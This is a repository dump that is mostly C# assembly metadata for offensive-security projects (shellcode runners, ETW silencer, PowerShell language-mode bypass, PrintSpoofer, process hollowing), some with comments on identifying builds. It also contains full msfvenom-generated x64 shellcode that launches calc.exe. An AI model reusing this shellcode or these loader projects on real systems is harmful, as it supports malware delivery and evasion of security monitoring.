12 | [assembly: AssemblyProduct("AES_SC_Encrypter")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("1192e99a-56c6-47e9-ad23-2a575cb21c7c")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/HeapAlloc_scRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("HeapAlloc_scRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("HeapAlloc_scRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("59b82577-fe4e-4eff-b54f-6f202d84a8c0")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/NT_ShellcodeRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("NT_ShellcodeRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("NT_ShellcodeRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("59ad52ea-9c04-4f3e-9128-1af62e82ead9")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PrintSpooferNET/PrintSpooferNET/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("PrintSpooferNET")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PrintSpooferNET")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("ce5eb36f-4310-42b2-bd11-8e5c48facb86")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_EarlyBird/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("DInvoke_EarlyBird")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_EarlyBird")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("65dd3952-3835-42d3-a6de-91d811e64f57")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Shellcode_Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("DLL_Shellcode_Runner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Shellcode_Runner")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("12bd1c11-9bc6-48ed-810c-1cb87caa79aa")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ETW/ETW-Silencer-CSharp/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("ETW-Silencer-CSharp")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ETW-Silencer-CSharp")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("ddf10de7-45b3-44b9-bcab-adee268a539e")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/Hollow_Caesar_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("Hollow_Caesar_ExNuma")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Hollow_Caesar_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("420c34e6-89fa-43e0-b3c2-8d0c9105d7f2")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/Fileless_Delivery_SMB/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("Fileless_Delivery_SMB")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Fileless_Delivery_SMB")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("edb58c04-477e-4f11-a03b-73b3f6da3f86")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("ShellcodeRunner_Caesar")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeRunner_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. NOTE(review): /CSharp/ShellcodeBuilder_Caesar declares the same GUID; harmless while ComVisible is false, but the two projects need distinct IDs before either is exposed to COM, and the GUID alone cannot tell their binaries apart.
23 | [assembly: Guid("50b568d7-3cda-4586-8bc8-8f4047c726e5")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("ShellcodeRunner_ExNuma")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeRunner_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("501ba458-d1c3-4f47-8d00-7f5bbaea3a28")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Powershell_CLM_Bypass/PSLangBypass/PSLangBypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("PSLangBypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. NOTE(review): the AssemblyInfo.cs under /PSLangBypass/PSLangBypass carries the same GUID and title; the two directories look like copies of one project.
23 | [assembly: Guid("c10f38a5-fe8e-4d99-aa8b-240f935778e5")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_VirtualAlloc/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("DInvoke_VirtualAlloc")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_VirtualAlloc")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. Stored in the built assembly's metadata and constant across rebuilds, so it ties a binary back to this project.
23 | [assembly: Guid("d6b0330c-55ef-4ee1-b698-2a5177947e9b")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeBuilder_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // Assembly-level identity attributes. The values below are emitted into the
6 | // compiled assembly's metadata; edit them to change the title, product and
7 | // copyright information that the built binary reports about itself.
8 | [assembly: AssemblyTitle("ShellcodeBuilder_Caesar")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeBuilder_Caesar")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // ComVisible(false) hides the types in this assembly from COM components.
18 | // If a type must be reachable from COM, set ComVisible(true) on that type
19 | // only, rather than changing this assembly-wide setting.
20 | [assembly: ComVisible(false)]
21 |
22 | // Typelib ID if this project is exposed to COM. NOTE(review): /CSharp/ShellcodeRunner_Caesar declares the same GUID; harmless while ComVisible is false, but the two projects need distinct IDs before either is exposed to COM, and the GUID alone cannot tell their binaries apart.
23 | [assembly: Guid("50b568d7-3cda-4586-8bc8-8f4047c726e5")]
24 |
25 | // The assembly version is made up of four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // Either give all four explicitly, or default the Build and Revision
33 | // numbers by writing '*' in their place, as in the commented-out line:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_DLL_Inject/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Reflective_DLL_Inject")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Reflective_DLL_Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2afd92e8-1410-4c6d-9e33-1b80dad8cbe8")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Reflective_XOR_Builder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Reflective_XOR_Builder")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Reflective_XOR_Builder")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("bbf3e552-7410-4ca2-ad21-4c2c2b5a48d3")] // kept in the compiled assembly's metadata and unaffected by renaming the file, so it can be used to recognise builds of this project
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass_SpawnShell/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass_SpawnShell")] // becomes the file description in the compiled binary's version resource; left at the project name here, so an unmodified build carries it
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass_SpawnShell")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("9c213991-b733-4907-be3f-03d8317ade11")] // kept in the compiled assembly's metadata and unaffected by renaming the file; the same value appears in /Powershell_CLM_Bypass/PSLangBypass/PSLangBypass_SpawnShell/Properties/AssemblyInfo.cs, so one match covers builds of both copies
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")] // file version shown in the binary's properties; author-chosen
37 |
--------------------------------------------------------------------------------
/shellcodes/Calc/calc-64.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/exec cmd="calc.exe" -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 276 bytes
6 | Final size of c file: 1185 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
9 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
10 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
11 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
12 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
13 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
14 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
15 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
16 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
17 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
18 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
19 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
20 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
21 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
22 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
23 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
24 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
25 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
26 | "\x63\x2e\x65\x78\x65\x00";
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
